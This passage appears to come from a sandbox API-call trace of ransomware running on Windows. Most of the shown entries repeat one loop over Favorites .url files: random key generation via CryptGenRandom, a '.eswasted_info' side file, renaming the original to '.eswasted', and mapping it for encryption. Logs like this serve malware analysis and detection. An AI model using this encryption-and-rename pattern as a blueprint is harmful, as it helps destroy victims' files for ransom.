(HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ebff0 [0078.084] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0078.085] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ebff0 | out: pbBuffer=0x4ebff0) returned 1 [0078.085] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0078.085] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0078.085] WriteFile (in: hFile=0x110, lpBuffer=0x4ebff0*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ebff0*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0078.086] SetEndOfFile (hFile=0x110) returned 1 [0078.086] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.086] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0078.086] lstrcpyW (in: lpString1=0x4e1410, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0078.086] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.eswasted")) returned 1 [0078.087] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0078.087] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0078.088] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0078.088] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0078.089] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0078.089] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0078.089] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0078.089] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0078.108] SetEndOfFile (hFile=0x110) returned 1 [0078.110] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0078.110] CloseHandle (hObject=0x110) returned 1 [0078.112] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1368 | out: hHeap=0x4a0000) returned 1 [0078.112] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0078.113] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0078.113] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0078.113] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned 70 [0078.113] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x296) returned 0x4e1ab8 [0078.113] lstrcpyW (in: lpString1=0x4e1b44, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0078.113] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0078.113] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0078.114] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0078.114] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0078.114] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0078.115] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0078.116] SetEndOfFile (hFile=0x110) returned 1 [0078.116] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.116] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0078.116] lstrcpyW (in: lpString1=0x4e1b44, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0078.116] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.eswasted")) returned 1 [0078.883] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0078.883] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0078.884] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0078.885] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0078.885] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0078.885] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0078.886] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0078.886] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0078.894] SetEndOfFile (hFile=0x110) returned 1 [0078.896] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0078.896] CloseHandle (hObject=0x110) returned 1 [0078.898] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0078.898] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0078.898] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0078.898] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0078.899] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 78 [0078.899] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a6) returned 0x4e19d0 [0078.899] lstrcpyW (in: lpString1=0x4e1a6c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0078.899] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0078.899] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0078.899] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0078.899] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0078.899] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0078.900] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0078.922] SetEndOfFile (hFile=0x110) returned 1 [0078.922] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.922] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0078.922] lstrcpyW (in: lpString1=0x4e1a6c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0078.922] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.eswasted")) returned 1 [0079.089] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0079.090] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0079.090] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0079.091] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0079.091] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.091] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0079.092] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0079.092] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.100] SetEndOfFile (hFile=0x110) returned 1 [0079.102] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.102] CloseHandle (hObject=0x110) returned 1 [0079.105] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e19d0 | out: hHeap=0x4a0000) returned 1 [0079.105] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0079.106] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0079.106] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.106] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned 64 [0079.106] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x28a) returned 0x4ef440 [0079.106] lstrcpyW (in: lpString1=0x4ef4c0, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.106] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0079.106] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0079.107] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0079.107] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.107] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0079.108] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0079.109] SetEndOfFile (hFile=0x110) returned 1 [0079.109] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.109] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.109] lstrcpyW (in: lpString1=0x4ef4c0, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.109] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.eswasted")) returned 1 [0079.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0079.110] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0079.111] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0079.112] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0079.112] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.112] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0079.112] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0079.112] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.133] SetEndOfFile (hFile=0x110) returned 1 [0079.135] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.135] CloseHandle (hObject=0x110) returned 1 [0079.137] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0079.137] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0079.138] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0079.138] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.138] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url") returned 77 [0079.138] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a4) returned 0x4d8aa8 [0079.138] lstrcpyW (in: lpString1=0x4d8b42, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.138] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0079.138] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0079.139] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0079.139] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.139] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0079.140] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0079.141] SetEndOfFile (hFile=0x110) returned 1 [0079.141] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.142] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.142] lstrcpyW (in: lpString1=0x4d8b42, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.142] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.eswasted")) returned 1 [0079.188] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0079.188] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0079.188] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0079.189] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d8da0 | out: pbBuffer=0x4d8da0) returned 1 [0079.189] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.189] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0079.190] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0079.190] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.199] SetEndOfFile (hFile=0x110) returned 1 [0079.201] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.201] CloseHandle (hObject=0x110) returned 1 [0079.202] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d8aa8 | out: hHeap=0x4a0000) returned 1 [0079.202] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0079.203] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0079.203] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.203] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url") returned 78 [0079.203] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a6) returned 0x4e0c48 [0079.203] lstrcpyW (in: lpString1=0x4e0ce4, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.203] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0079.203] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0079.204] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0079.204] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.204] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0079.204] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0079.205] SetEndOfFile (hFile=0x110) returned 1 [0079.206] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.206] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.206] lstrcpyW (in: lpString1=0x4e0ce4, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.206] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.eswasted")) returned 1 [0079.206] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0079.207] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0079.207] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0079.208] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0079.208] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.208] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0079.209] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0079.209] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.242] SetEndOfFile (hFile=0x110) returned 1 [0079.244] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.244] CloseHandle (hObject=0x110) returned 1 [0079.247] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e0c48 | out: hHeap=0x4a0000) returned 1 [0079.247] CryptAcquireContextW (in: 